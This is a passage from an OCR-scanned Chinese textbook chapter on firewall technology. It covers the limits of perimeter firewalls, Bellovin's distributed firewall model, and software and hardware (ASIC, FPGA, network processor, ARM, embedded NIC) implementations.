。 运行 各 种 代理 服务 ,如 WWW、FTP、Telnet 等 。 


4.3 分 布 式 防火 墙 技术 


4.3.1 传统 防火 墙 案例 分 析 


传统 防火 墙 因 其 位 于 网 络 的 入 口 处 , 亦 称 为 边界 防火 墙 。 防火墙 将 网 络 分 隔 成 两 个 部 
分 ,内 部 网 络 和 外 部 网 络 。 

由 于 防火 墙 不 能 过 滤 那 些 “ 看 不 到 ”的 传输 (内 部 网 络 的 传输 不 需要 经 过 防火 墙 ,因此 防 
火 墙 看 不 见 ) ,因此 它 只 能 假定 所 有 位 于 内 部 网 络 的 主机 是 可 信任 的 ,而 所 有 外 部 的 主机 都 
是 不 可 信任 的 。 这 个 模型 在 网 络 严格 遵守 限定 的 拓扑 布局 时 工作 得 很 好 。 但 是 随 着 网 络 连 
通 性 的 扩展 ,如 远程 交换 和 VPN 等 ,这 个 模型 面临 着 越 来 越 大 的 挑战 。 

先 来 看 一 个 例子 : 某 企 业 在 企业 网 络 与 外 部 企业 之 间 加 上 了 一 层 防 火 墙 ,如 图 4. 8 所 
示 。 对 外 部 的 访问 设置 严格 的 控制 ,因为 内 部 有 一 些 包括 资料 账户 等 重要 信息 ,而 这 样 的 做 
法 却 被 轻易 地 攻破 ,到 底 是 被 什么 样 的 方法 攻破 的 呢 ? 防火 墙 同时 来 给 公司 的 资源 访问 及 
跨 地 域 工作 带 来 了 困扰 ,这 又 是 为 什么 ? 

如 图 4.9 所 示 。 入 侵 者 可 以 通过 物理 方法 接 入 内 部 网 络 , 如 在 办 公 室 直接 接 上 网 线 ,这 
样 就 可 以 绕 过 防火 墙 的 监控 接 入 内 部 的 服务 器 。 

网 络 中 的 数据 是 由 一 个 个 数据 包 组 成 的 ,防火 墙 对 每 个 数据 包 的 处 理 要 耗费 资源 。 雁 
吐 量 是 指 在 不 丢 包 的 情况 下 单位 时 间 内 通过 防火 墙 的 数据 包 数 量 。 随 着 Internet 的 日 益 普 
及 ,内 部 网 用 户 访 问 Internet 的 需求 在 不 断 增 加 .一 些 企 业 也 需要 对 外 提供 诸如 FTP、DNS 
等 服务 ,这 些 因素 会 导致 网 络 流量 的 急剧 增加 ,而 防火 墙 作为 内 外 网 之 间 的 唯一 数据 通道 ， 
如 果 香 吐 量 太 小 ,就 会 成 为 网 络 瓶 颈 , 给 整个 网 络 的 传输 效率 带 来 负面 影响 。 因 此 ,考察 防 
火 墙 的 吞吐 能 力 有 助 于 更 好 地 评价 其 性 能 表现 。 这 也 是 测量 防火 墙 性 能 的 重要 指标 。 

举 一 个 常见 的 例子 .校内 资源 一 般 是 无 法 直接 访问 的 ,但 是 能 用 VPN 隧道 等 技术 访问 
校内 防火 墙 后 的 网 站 。 

一 些 带 有 病毒 的 邮件 会 被 防火 墙 拦截 ,但 是 如 果 这 个 邮件 中 的 病毒 进行 过 加 密 ,就 可 以 
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图 4.9 内 部 人 侵 示意 图 


轻易 地 骗 过 防火 墙 。 例 如 梅 丽 落 病 毒 就 可 以 利用 加 密 的 方法 骗 过 防火 墙 。 
内 部 网 络 中 可 能 存在 多 个 防火 墙 , 这 样 的 防御 策略 的 制定 就 非常 麻烦 ,由 于 防火 墙 有 着 
不 同 的 功能 ,不 能 对 其 进行 相同 的 管理 ,需要 对 各 个 防火 墙 进行 不 同 的 设置 与 维护 。 例 如 最 
上 层 的 防火 墙 是 与 外 部 连接 的 防火 墙 ,需要 对 大 量 的 交互 数据 进行 过 滤 与 处 理 , 所 以 需要 大 
流量 吞吐 防火 墙 ; 而 下 一 层 的 防火 墙 则 需要 做 到 权限 控制 ,控制 谁 具有 什么 样 的 权限 。 
集中 式 防火 墙 具 有 以 下 缺点 : 
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。 防 外 不 防 内 。 传 统 防火 墙 一 般 位 于 网 络 的 入口 处 ,对 于 外 来 的 攻击 可 以 有 效 地 抵 
制 ,但 是 对 于 网 络 内 部 的 攻击 却 无 能 为 力 。 传 统 防火 墙 是 基于 这 样 一 个 假设 , 即 每 
一 个 外 部 用 户 都 是 一 个 潜在 的 敌人 ,而 内 部 用 户 均 是 可 信任 的 。 然 而 实际 环境 中 ， 
大 多 数 的 攻击 来 自 内 部 ,即使 用 户 是 诚实 可 靠 的 ,一 些 恶意 的 病毒 .蠕虫 代码 亦 会 将 
诚实 的 用 户 变 成 一 个 不 知情 的 攻击 者 。 

。 瓶颈 问题 。 防 火 墙 位 于 网 络 的 接 入 口 ,其 吞吐 量 直 接 影响 网 络 的 性 能 。 虽 然 计算 机 
硬件 的 处 理 能 力 在 不 断 提 高 ,但 是 更 快 的 网 络 速度 和 更 复杂 的 协议 相 结合 产生 的 效 
果 对 防火 墙 的 计算 能 力 提出 了 严峻 的 挑战 ,使 得 防火 墙 易 成 为 网 络 的 瓶颈 和 单 点 失 
效 点 。 

。 易 被 绕 过 。 现 在 计算 机 接 入 网 络 的 方式 多 种 多 样 , 人 们 可 以 很 轻易 地 建立 一 个 非 授 

权 的 接 入 点 。 各 种 隧道 技术 、 无 线 接 入 技术 和 拨号 访问 都 可 以 绕 过 防火 墙 的 安全 机 

制 。 纵 然 防火 墙 的 策略 定义 得 很 完善 ,对 它 无 法 控制 的 接 人 也 无 可 奈何 。 对 于 这 种 

网 络 外 部 的 远程 访问 , 吸 需 一 种 行 之 有 效 的 保护 和 防范 措施 。 

端 到 端的 加 密 对 传统 防火 墙 也 是 一 个 威胁 。 传 统 防火 墙 的 分 组 过 滤 方 法 需要 察看 

分 组 包头 的 信息 来 进行 过 滤 ,防火 墙 无 法 从 加 密 的 报 文中 获取 其 所 需 的 信息 。 

*。 策略 的 制定 和 维护 复杂 。 传 统 防火 墙根 据 网 络 的 拓扑 结构 制定 规则 。 在 大 型 的 网 
络 中 ,往往 有 多 个 接 和 人 点 和 内 部 防火 墙 , 这 使 得 策略 管理 非常 复杂 ,一般 没有 一 种 通 
用 的 管理 机 制 ,通常 主要 依靠 网 络 管理 员 的 能 力 和 经 验 。 


4.3.2 分 布 式 防火 墙 的 基本 原理 


传统 防火 墙 的 很 多 缺陷 主要 集中 在 依赖 于 网 络 拓扑 结构 和 单一 接 人 控制 。Tom 
Markham 对 此 形象 地 加 以 比喻 :“ 网 络 工程 师 和 安全 管理 员 被 绑 住 脚 趴 与 攻击 者 进行 一 场 
比赛 ,而 网 络 拓扑 结构 就 是 这 个 绑 绳 。" 想 要 克服 传统 防火 墙 的 缺点 ,就 必须 打破 这 一 束缚 。 

Steven M. Bellovin 于 1999 年 首次 提出 了 分 布 式 防火 墙 的 概念 。 在 这 种 模式 下 ,策略 
仍 是 由 一 个 中 心 统 一 定义 ,而 策略 的 执行 却 是 由 各 个 端 节点 完成 的 。 如 此 便 消除 了 单一 接 
入 点 ,内 网 和 外 网 的 划分 并 不 依赖 于 网 络 的 拓扑 结构 ,因此 内 网 的 定义 具有 更 多 的 逻辑 意 
义 ,可 以 包含 局 域 网 内 无 线 接 人 的 用 户 ,拨号 用 户 、 通 过 VPN 连接 的 用 户 ,而 不 仅 限于 传统 
意义 上 某 个 房间 或 某 栋 建筑 中 的 网 络 。 

相应 地 ,在 防火 墙 的 策略 上 也 不 需 按 照 网 络 拓 扑 结 构 来 制定 访问 控制 列表 ,管理 员 可 以 
更 专注 于 对 被 保护 的 对 象 来 制定 规则 。 图 4. 10 给 出 了 分 布 式 防火 墙 的 模型 架构 。 

在 图 4. 10 中 ,没有 了 边界 防火 墙 ,取而代之 的 是 每 个 桌面 计算 机 都 通过 安全 策略 机 制 
进行 控制 ,这 些 安全 策略 来 自 策略 服务 器 ,系统 管理 员 设 置 统一 的 安全 管理 策略 ,由 各 桌面 
计算 机 的 通信 模块 自动 下 载 并 更 新 本 地 策略 。 

这 种 分 布 式 防火 墙 最 大 的 优点 是 防火 墙 不 再 受 限 于 拓扑 结构 ,并 且 将 单 点 防护 变 成 了 
多 点 防护 , 即 * 全 民 皆 兵 ", 从 而 大 大 提高 了 防护 能 力 和 数据 交换 效率 。 同 时 ,分 布 式 防火 墙 
不 会 再 有 边界 防火 墙 存在 的 瓶颈 问题 ,吞吐 量 不 再 受 防 火 墙 的 速率 限制 , 某 一 点 的 连接 失败 
不 再 会 隔离 整个 网 络 。 

因此 ,一 个 分 布 式 防火 墙 系统 包含 3 个 基本 组 件 : 

(1) 策略 语言 。 用 于 描述 安全 策略 。 分 布 式 防 火 墙 系统 提供 一 个 策略 服务 器 ,系统 管 
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理 员 利用 策略 服务 器 上 提供 的 工具 和 策略 数据 库 来 制定 和 保存 策略 。 策 略 最 简单 的 形式 就 
是 传统 防火 墙 中 的 包 过 滤 规 则 ,一 个 好 的 实现 可 能 使 用 更 为 高 级 的 语言 ,如 KeyNote 信任 
管理 系统 中 提供 的 策略 描述 语言 。 

(2) 安全 分 发 策略 的 机 制 。 策 略 保存 在 策略 服务 器 上 ,在 向 特定 的 主机 发 送 策略 的 时 
候 需要 有 一 种 机 制 保证 策略 不 被 算 改 和 伪造 。 端 主机 和 策略 服务 器 亦 需 有 能 力 证 实 自身 的 
身份 。 

(3) 策略 的 执行 部 分 。 分 布 式 防火 墙 系统 中 策略 的 执行 下 推 到 主机 ,由 各 主机 对 进出 
其 自身 的 分 组 或 连接 进行 过 滤 ,这 也 正 是 分 布 式 防火 墙 体现 其 分 布 式 的 地 方 ,每 个 结 点 都 参 
与 防火 墙 的 工作 。 把 策略 的 执行 下 放 到 各 主机 端 ,最 直接 的 好 处 就 是 可 以 分 散 传统 防火 墙 
的 工作 ,避免 瓶颈 并 保证 防火 墙 不 会 被 绕 过 ,因为 任何 进出 网 络 的 数据 包 都 会 被 分 布 到 端 节 
点 的 防火 墙 “看 到 ”。 

分 布 式 防火 墙 的 工作 过 程 可 以 描述 如 下 : 

(1) 由 系统 管理 员 在 策略 服务 器 上 针对 受 保护 的 对 象 制定 策略 。 

(2) 策略 服务 器 上 的 策略 管理 组 件 将 策略 编译 成 适用 于 各 个 主机 的 规则 集 。 

(3) 各 主机 在 启动 时 从 策略 服务 器 上 下 载 最 新 的 规则 集 。 

(4) 主机 上 的 策略 执行 模块 根据 规则 集 对 进出 的 网 络 包 或 连接 做 出 判定 ,决定 是 否 接 收 。 

(5) 策略 更 新 后 ,策略 服务 器 应 当 通 知 主机 下 载 最 新 版 本 。 

(6) 主机 上 的 策略 执行 模块 在 正常 工作 时 向 策略 服务 器 发 送审 计 事 务 。 

因此 分 布 式 防火 墙 最 基本 的 特征 就 是 : 策略 在 策略 服务 器 上 集中 定义 ,但 策略 的 实施 
由 各 端点 执行 。 策 略 的 执行 既 可 以 由 主机 上 的 一 个 系统 进程 来 完成 ,也 可 以 是 一 个 专门 的 硬 
件 。 应 当 注 意 到 分 布 式 防火 墙 与 个 人 防火 墙 之 间 的 区 别 。 个 人 防火 墙 多 为 安装 在 主机 上 的 软 
件 防 火 墙 ,如 天 网 ,ZoneAlarm 等 ,近年 来 亦 出 现 主机 板 上 整合 的 硬件 防火 墙 ,虽然 个 人 防火 墙 
也 是 由 各 主机 实施 策略 ,但 是 其 策略 是 由 主机 用 户 自行 定义 的 ,缺乏 集中 统一 的 管理 。 


4.3.3 分布 式 防火 墙 实现 机 制 


4.3.3.1 基于 软件 的 实现 机 制 


1. 基于 OpenBSD UNIX 的 实现 
该 方案 的 原型 是 Steven 等 人 设计 的 。 该 系统 是 在 OpenBSD UNIX 操作 系统 上 修改 内 
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核 并 利用 KeyNote IPSec 等 技术 加 以 实现 的 。OpenBSD 是 理想 的 安全 应 用 开发 的 平台 , 因 
为 它 有 一 体 化 的 安全 特性 和 开发 库 (IPSec 栈 、KeyNote、SSL 等 ) 。 

该 原型 系统 (主机 部 分 ) 包 括 3 个 组 件 : 

。 内 核 扩展 程序 ,用 于 实施 安全 机 制 。 

。 用 户 层 后 台 处 理 程序 ,用 于 执行 分 布 式 防火 墙 策略 。 

。 设备 驱动 程序 ,为 内 核 和 策略 后 台 程 序 之 间 的 双向 通信 提供 接口 。 

2. 基于 Windows 平台 的 实现 

CyberWallPLUS 是 Network-1( 美 国 瑞安 ) 公 司 提出 的 分 布 式 防火 墙 方案 ,该 原型 基于 
Windows 平 台 实现 ,用 于 保护 Windows NT/2000 桌面 和 服务 器 ,包括 中 心 管理 部 件 、 桌 面 
客户 端 防火 墙 部 件 、 服 务 器 防火 墙 部 件 、 边 界 防 火 墙 部 件 等 。 

在 这 些 部 件 中 ,主机 防火 墙 最 具 特 色 , 用 户 可 以 针对 该 主机 上 的 具体 应 用 和 对 外 提供 的 
服务 设 定 个 性 化 的 安全 策略 ,其 主要 模块 包括 包 过 滤 引 擎 和 用 户 配置 接口 。 包 过 滤 引 擎 采 
用 嵌入 内 核 的 方式 运行 ,位 于 链 路 层 和 网 络 层 之 间 ,提供 访问 控制 ,状态 检测 和 和 人 侵 检测 。 
管理 员 通过 用 户 配置 接口 在 本 地 配置 安全 策略 。 

这 些 基 于 操作 系统 层面 上 实现 的 嵌入 式 防 火 墙 存在 “功能 悖 论 ”, 其 实用 价值 有 待 提升 。 

4.3.3.2 基于 硬件 的 实现 机 制 

1. ASIC 

ASICCApplication Specific Integrated Circuit) 是 一 种 专门 用 于 某 种 应 用 的 芯片 , 它 将 
算法 固化 在 硬件 中 ,性 能 优越 。 内 嵌 在 ASIC 里 的 RISC 处 理 器 ,无 须 依赖 主机 CPU 处 理 所 
有 的 数据 ,进而 大 大 减少 了 系统 总 线 的 负担 ,消除 了 主机 CPU 和 系统 总 线 的 瓶颈 。 同 时 ， 
通过 ASIC 中 的 多 个 内 由 RISC 处 理 器 ,可 执行 为 实现 各 种 应 用 而 编制 的 程序 ,例如 包 分 类 、 
负载 均衡 和 路 由 选择 等 。 采 用 ASIC 技术 可 以 为 防火 墙 应 用 设计 专门 的 数据 处 理 流水 线 ， 
优化 存储 器 等 资源 的 利用 ,使 防火 墙 处 理 速度 达到 线 速 千 兆 ,充分 体现 了 硬件 实现 防火 墙 所 
带 来 的 高 效 处 理 的 优点 。ASIC 技术 可 以 比较 容易 地 集成 IDS、VPN、 内 容 过 滤 和 防 病 毒 等 
功能 ,但 ASIC 技术 开发 成 本 高 ,开发 周期 长 ,难度 较 大 。 

2. FPGA 

虽然 ASIC 最 终 产 品 的 成 本 很 低 , 但 设计 周期 长 ,研发 费用 高 ,风险 较 大 ,而 PLD 
(Programmable Logical Device, 可 编程 逻辑 器 件 ) 设 计 灵 活 ,功能 强大 ,尤其 是 高 密度 
FPGA(Field Programmable Gate Array, 现 场 可 编程 逻辑 器 件 ) 的 设计 性 能 已 完全 能 够 与 
ASIC 媲美 ,并 且 由 于 FPGA 的 逐步 普及 ,其 性 价 比 已 足以 与 ASIC 抗衡 。 因 此 ,FPGA 在 
嵌入 式 系统 设计 领域 占据 着 越 来 越 重 要 的 地 位 。 

FPGA 采 用 了 逻辑 单元 阵列 (Logic Cell Array, LCA) ,内 部 包括 可 配置 逻辑 模块 
(Configurable Logic Block,CLB)、 输 入 输出 模块 (Input Output Block,IOB) 和 内 部 连 线 
(Interconnect)3 个 部 分 。 

FPGA 的 基本 特点 如 下 : 

。 采用 FPGA 设计 ASIC 电路 ,用 户 不 需要 投 片 生产 ,就 能 得 到 可 用 的 芯片 。 

。EFPGA 可 作为 其 他 全 定制 或 半 定 制 ASIC 电路 的 中 试 样片 。 

。 FPGA 内 部 有 丰富 的 触发 器 和 I/O 引 脚 。 


142 网 络 安全 





。 FPGA 是 ASIC 中 设计 周期 最 短 、 开 发 费用 最 低 、 风 险 最 小 的 器 件 之 一 。 
。 FPGA 采用 高 速 CHMOS 工艺 , 功 耗 低 , 可 以 与 CMOS、TTL 电 平 兼容 。 
FPGA 是 由 存放 在 片 内 RAM 中 的 程序 来 设置 其 工作 状态 的 ,因此 ,工作 时 需要 对 片 内 
的 RAM 进行 编程 。 用 户 可 以 根据 不 同 的 配置 模式 ,采用 不 同 的 编程 方式 。 加 电 时 ,FPGA 
芯片 将 EPROM 中 数据 读 入 片 内 编程 RAM 中 ,配置 完成 后 ,FPGA 进入 工作 状态 。 掉 电 
后 ,FPGA 内 部 逻辑 关系 消失 ,因此 ,FPGA 能 被 反复 使 用 。FPGA 的 编程 无 须 使 用 专用 的 
FPGA 编程 器 ,只 需 使 用 通用 的 EPROM、PROM 编程 器 即 可 。 同 一 片 FPGA ,不 同 的 编程 
数据 可 以 产生 不 同 的 电路 功能 。 因 此 ,FPGA 的 使 用 非常 灵活 。 
FPGA 支持 所 有 每 秒 几 千 兆 位 的 并 行 或 串 行 的 接口 ,因而 适合 于 数据 连接 、 传 输 管理 和 
交换 结构 接口 。FPGA 的 线 速 数据 处 理 和 FSM 密集 的 查 表 功 能 比 网 络 处 理 器 (Network 
Processor, NP) 更 快 .更 多 。 但 策略 规则 一 般 通 过 硬件 描述 语言 (Hardware Description 
Language, HDL) 来 设计 ,并 存放 到 FPGA 嵌入 式 存储 器 中 ,所 以 如 果 需 要 修改 策略 规则 ,就 
必须 修改 HDL 或 修改 FPGA 嵌入 存储 器 。 这 使 得 在 线 更 新 策略 规则 非常 困难 。 
3. 网 络 处 理 器 
网 络 处 理 器 是 专门 为 处 理 分 组 而 设计 的 可 编程 处 理 器 ,内 含 多 个 数据 处 理 引 擎 ,可 以 并 
发 进行 数据 处 理工 作 , 在 处 理 Layer2 和 Layer3 的 数据 上 比 通用 处 理 器 具有 明显 的 优势 。 
网 络 处 理 器 对 分 组 处 理 的 一 般 性 任务 进行 了 优化 ,如 TCP/IP 数据 的 校 验 和 计算 、 包 分 类 
等 ,同时 硬件 体系 结构 的 设计 也 大 多 采用 高 速 的 接口 技术 和 总 线 规范 ,具有 较 高 的 IO 能 
力 。 这 样 基于 网 络 处 理 器 的 网 络 设 备 的 包 处 理 能 力 得 到 了 很 大 提升 。 网 络 处 理 器 一 般 具有 
以 下 特点 : 
。 具 有 并 行 处 理 器 。 采 用 多 内 核 并 行 处 理 器 结构 , 片 内 处 理 器 按 任务 分 为 核心 处 理 器 
和 转发 引擎 。 

。 采用 专用 硬件 协 处 理 器 。 对 要 求 高 速 处 理 的 通用 功能 模块 采用 专用 硬件 以 提高 系 
统 性 能 。 

。 实用 专用 指令 集 。 转 发 引擎 通常 采用 专用 的 精简 指令 集 , 并 针对 网 络 协议 的 处 理 特 
点 进行 优化 。 

。 分 级 存储 器 组 织 。NP 存储 器 一 般 包 含 多 种 不 同性 能 的 存储 结构 ,对 数据 进行 分 类 

存储 以 适应 不 同 的 应 用 需求 。 
。 高速 1O 接口 。NP 具有 丰富 的 高 速 IO 接口 ,包括 物理 链 路 接口 、 交 换 接口 .存储 
器 接口 与 PCI 总 线 接口 等 ,通过 内 部 高 速 总 线 连接 在 一 起 ,提供 强大 的 并 行 处 理 
能 力 。 

。 可 扩展 性 。 多 个 NP 之 间 还 可 以 互 连 ,构成 网 络 处 理 器 簇 ,以 支持 大 型 高 速 的 网 络 
处 理 。 

从 网 络 处 理 器 的 以 上 特点 可 以 看 出 ,与 通用 处 理 器 相 比 ,网 络 处 理 器 在 网 络 分 组 数据 处 
理 上 具有 明显 的 优势 。 

以 Intel 公司 的 IXP 系列 产品 为 代表 .分 为 控制 和 处 理 ( 或 称 数据 ) 两 个 平面 。 如 Intel 
公司 的 IXP 1200 ,控制 平面 是 一 个 ARM 核 ,负责 维护 系统 信息 和 协调 处 理 部 分 工作 ,处 理 
平面 由 多 个 微 引 擎 (Micro Engine) 和 其 他 专用 硬件 组 成 ,负责 利用 控制 平面 下 发 的 微 代 码 
和 命令 直接 处 理 网 络 数据 。 这 种 方式 对 分 组 进行 简单 过 滤 时 性 能 较 好 ,但 是 由 于 体系 结构 
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限制 ,尤其 是 微 代码 的 开发 相对 复杂 ,导致 灵活 性 较 差 ,难以 满足 复杂 多 变 的 市 场 需求 ,一 般 
适合 3 层 (IP 层 ) 及 以 下 网 络 数据 的 处 理 。 另 一 类 产品 以 SiByte 的 Mercurian 系列 产品 为 
代表 , 它 基 于 MIPS CPU 设计 ,如 SB1250。 它 一 方面 保持 了 基于 通用 CPU 设计 的 灵活 性 ， 
另 一 方面 通过 片上 系统 (System On Chip,SOC) 的 方式 消除 了 传统 CPU .总线 .设备 之 间 带 
宽 的 瓶颈 问题 。 这 类 产品 灵活 性 较 强 ,易于 开发 .升级 和 维护 , 适 于 构建 速度 可 与 专用 
ASIC 相 媲 美的 完全 可 编程 的 网 络 处 理 平台 。 

基于 NP 可 以 构造 各 种 专用 中 高 档 网 络 设备 , 如 路 由 器 .三 层 交换 机 、 集 中 式 防 火 墙 ,对 
于 桌面 防火 墙 而 言 不 具有 价格 优势 。 

4. ARM 处 理 器 

ARM(Advanced RISC Machines) 可 认为 是 对 一 类 微 处 理 器 的 通称 。1991 年 ,ARM 公 
司 成 立 于 英国 剑桥 ,设计 了 大 量 高 性 能 、 廉 价 、 耗 能 低 的 RISC 处 理 器 、 相 关 技 术 及 软件 。 
ARM 架构 是 面向 低 预算 市 场 设计 的 RISC 微 处 理 器 ,基本 是 32 位 单片机 的 行业 标准 ,提供 
一 系列 内 核 ,体系 扩展 、 微 处 理 器 和 系统 芯片 方案 ,ARM 架构 的 各 功能 模块 可 供 生产 厂商 
根据 不 同 用 户 的 要 求 来 配置 生产 。 由 于 所 有 产品 均 采 用 一 个 通用 的 软件 体系 ,所 以 相同 的 
软件 可 在 所 有 ARM 产品 中 运行 ,有 效 地 缩短 应 用 程序 的 开发 与 测试 时 间 。 目 前 ,采用 
ARM 技术 知识 产权 核 的 微 处 理 器 ( 即 ARM 微 处 理 器 ) 已 遍及 工业 控制 .消费 类 电子 产品 、 
通信 系统 、 网 络 系统 、 无 线 系统 等 各 类 产品 市 场 ,基于 ARM 技术 的 微 处 理 器 应 用 约 占据 了 
32 位 RISC 微 处 理 器 75% 以 上 的 市 场 份 额 。 

采用 RISC 架构 的 ARM 微 处 理 器 一 般 具 有 如 下 特点 : 

。 体积 小 , 低 功 耗 , 低 成 本 ,高 性 能 。 

。 支持 Thumb(16 位 )/ARM(32 位 ) 双 指令 集 ,兼容 8 位 /16 位 器 件 。 

。 大 量 使 用 寄存 器 ,指令 执行 速度 更 快 。 

。 大 多 数 数据 操作 都 在 寄存 器 中 完成 。 

。 寻 址 方式 灵活 简单 ,执行 效率 高 。 

。 指令 长 度 固定 。 

ARM 处 理 器 目前 包括 下 面 几 个 系列 的 处 理 器 产品 : ARM7 系列 、ARM9 系列 、 
ARM9E 系列 .ARM10 系列 、SecurCore 系列 、Intel 的 Xscale 和 StrongARM。ARM9 系列 
处 理 器 是 新 近 推 出 且 性 能 比较 稳定 的 一 个 系列 ,包括 ARM920T、ART922T、ARM940T 
3 种 类 型 ,适用 于 不 同 需求 。 

ARM 具有 比较 强 的 事务 管理 功能 ,可 编制 各 种 安全 应 用 程序 ,其 优势 主要 体现 在 控制 
方面 及 后 续 扩展 。 本 章 主要 研究 基于 ARM920T 架构 的 嵌入 式 防火 墙 的 实现 机 制 。 

5. 基于 硬件 实现 的 各 种 方法 对 比 

1) NP 与 FPGA 

基于 网 络 处 理 器 的 防火 墙 本 质 上 是 基于 软件 的 解决 方案 ,因而 处 理 更 加 灵活 ,易于 升 
级 ; 而 FPGA 将 算法 固化 在 硬件 中 ,性 能 优越 ,但 其 灵活 性 规则 更 新 及 升级 不 如 网 络 处 
理 器 。 

2) NP 与 ASIC 

基于 ASIC 的 嵌入 式 防火 墙 使 用 专门 的 硬件 处 理 网 络 数据 流 , 具 有 较 高 的 处 理性 能 。 
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但 是 纯 硬件 ASIC 嵌入 式 防火 墙 缺乏 可 编程 性 ,因而 灵活 性 差 ,难以 跟 上 防火 墙 功能 的 快速 
发 展 ; 而 基于 网 络 处 理 器 的 嵌入 式 防 火 墙 具有 较 大 的 灵活 性 。 

3) ARM 与 NP 

基于 ARM 的 嵌入 式 防 火 墙 与 基于 NP 的 防火 墙 的 主要 区 别 是 处 理 网 络 数据 部 分 。 
NP 主要 由 微 引 擎 层面 实现 ,建立 在 硬件 和 软件 配合 的 基础 上 ,吞吐 量 高 ,时 延 小 ,一 般 只 针 
对 高 端的 防火 墙 ,吞吐 量 在 几 百 兆 每 秒 至 千 兆 每 秒 。 其 实现 成 本 较 高 ,难以 部 署 到 桌面 级 防 
护 。 基 于 ARM 的 防火 墙 ,处 理 网 络 数据 由 软件 实现 ,主要 针对 个 人 用 户 和 小 型 局 域 网 , 实 
现 对 主机 端的 保护 。 

4.3.3.3 软 硬 件 实现 机 制 对 比 

针对 以 上 防火 墙 的 软 硬 件 两 种 实现 机 制 对 比如 下 : 

。 运行 环境 。 软 件 防火 墙 运行 在 主机 的 操作 系统 之 上 ,由 于 主机 操作 系统 自身 的 安全 
问题 ,需要 不 断 增加 操作 系统 的 补丁 来 提高 安全 性 ; 基于 嵌入 式 技术 的 分 布 式 硬件 
防火 墙 运行 在 独立 的 嵌入 式 操作 系统 上 ,是 一 个 独立 封闭 的 系统 。 

。 系统 的 运行 速度 。 软 件 防火 墙 受 系统 资源 的 影响 比较 大 ,而 硬件 防火 墙 受 硬件 配置 
的 影响 比较 大 。 

。 稳 定性 和 兼容 性 。 软 件 防火 墙 因为 对 操作 系统 有 依赖 性 ,所 以 它 的 兼容 性 存在 问 
题 ; 而 硬件 防火 墙 采 用 专门 的 软 硬 件 系统 ,稳定 性 和 兼容 性 更 好 。 

。 功能 的 灵活 性 。 软 件 防火 墙 架 构 不 依赖 硬件 ,因此 功能 可 以 根据 用 户 的 需求 进行 定 
制 ; 而 硬件 防火 墙 则 需 考虑 硬件 的 成 本 ,功能 和 灵活 性 相对 要 弱 一 些 。 

。 升级 。 软 件 防 火 墙 的 升级 较为 方便 ; 而 硬件 防火 墙 的 升级 可 能 涉及 硬件 的 升级 , 升 
级 代价 高 于 纯 软 件 防火 墙 。 





4.4 嵌入 式 防 火 墙 技术 


4.4.1 骨 入 式 防火 墙 的 概念 


传统 的 集中 式 防 火 墙 一 般 作 用 在 内 部 网 络 与 外 部 不 可 信任 的 网 络 之 间 , 对 进出 网 络 的 
包 进 行 检测 和 过 滤 , 处 理 速 度 快 ,延迟 小 ,能 够 满足 目前 越 来 越 多 的 多 媒体 应 用 。 但 是 它们 
实现 的 成 本 较 高 ,存在 防 外 不 防 内 、 流 量 集中 ,依赖 拓扑 结构 等 缺陷 ,而 分 布 式 防火 墙 则 能 够 
有 效 解决 集中 式 防火 墙 的 不 足 。 

分 布 式 防 火 墙 有 两 种 实现 机 制 : 一 种 是 基于 软件 实现 ,在 操作 系统 上 加 载 防火 墙 软件 ， 
实现 对 操作 系统 的 防护 ,但 这 种 方式 存在 防火 墙 和 操作 系统 的 功能 悖 论 , 即 谁 保护 谁 的 问 
题 ; 另 一 种 方式 是 基于 硬件 实现 。 这 种 方式 独立 于 受 保护 的 操作 系统 ,能 够 有 效 地 保护 主 
机 的 安全 。 

Bellovin 等 人 实现 的 原型 系统 是 通过 修改 系统 内 核 来 实现 策略 执行 的 ,但 是 该 实现 并 
不 完善 。 分 布 式 防火 墙 可 以 抵御 来 自 内 部 的 攻击 ,但 是 如 果 主 机 用 户 能 够 算 改 策略 或 者 禁 
用 了 防火 墙 的 功能 , 则 这 个 防火 墙 系统 是 不 安全 的 。 

如 果 用 户 无 意 中 运行 了 电子 邮件 中 的 黑客 程序 ,该 程序 执行 后 获取 系统 管理 员 权限 , 随 
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后 禁用 防火 墙 , 则 该 主机 将 完全 暴露 于 未 来 的 攻击 之 下 。 仅 靠 操作 系统 提供 的 保护 是 不 能 
保障 防火 墙 正常 运行 的 ,因为 这 是 一 个 环形 逻辑 ,防火 墙 本 意 用 来 保护 操作 系统 ,而 现在 又 
必须 由 操作 系统 来 保护 防火 墙 。 到 底 是 防火 墙 保护 操作 系统 还 是 操作 系统 保护 防火 墙 ? 

为 此 ,Bellovin 指出 :“ 为 了 实现 更 严格 的 保护 ,策略 执行 组 件 可 以 整合 到 一 块 抗 干扰 
(tamper-resist) 的 网 卡 上 。”Tom Markham 和 Charles Payne 按照 这 一 思想 ,设计 了 一 个 基 
于 增强 型 以 太 网 卡 EFW NIC(Embedded Firewall Network Interface Card) 的 分 布 式 防火 
墙 系统 ,由 硬件 来 实现 策略 的 执行 模块 。 


4.4.2 嵌入 式 防火 墙 的 结构 
一 个 典型 的 嵌入 分 布 式 防 火 墙 系统 如 图 4. 11 所 示 。 
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图 4.11 嵌入 式 防火 墙 结构 


在 图 4. 11 中 ,局 域 网 表示 一 个 受 保护 的 内 部 网 络 , 例 如 一 个 企业 网 络 ; Internet 是 互联 
网 ,代表 一 个 不 安全 的 区 域 。 每 一 个 EFW 就 是 一 块 带 有 防火 墙 功能 的 网 卡 , 该 网 卡 在 硬件 
级 实现 对 网 络 包 的 实时 过 滤 , 网 卡 上 有 自己 的 处 理 器 和 存储 区 ,独立 于 主机 操作 系统 工作 。 
所 有 的 EFW 网 卡 构 成 分 布 式 防火 墙 系统 的 策略 执行 组 件 ,策略 服务 器 负责 管理 这 些 
EFW NIC。 

内 部 网 络 上 的 每 一 台 PC 工作 站 或 服务 器 ,包括 策略 服务 器 自身 , 均 受 到 分 布 式 防火 墙 
的 保护 。 企 业内 部 的 移动 用 户 也 可 以 安装 EFW NIC ,获取 分 布 式 防火 墙 的 保护 以 及 获准 访 
问 企业 内 部 资源 。 然 而 ,使 用 分 布 式 防火 墙 并 不 意味 着 完全 放弃 传统 边界 防火 墙 。 

边界 防火 墙 可 以 作为 内 部 网 络 对 外 的 第 一 道 屏障 ,可 以 有 效 地 将 大 量 的 外 部 攻击 抵御 
于 内 部 网 络 之 外 ,不 必 将 其 放 入 内 部 后 再 抵御 ,可 以 减少 内 部 网 络 的 数据 流量 和 EFW NIC 
的 工作 量 , 因 此 在 实际 应 用 中 ,采用 两 者 结合 的 方法 ,可 以 获得 更 高 的 系统 性 能 。 

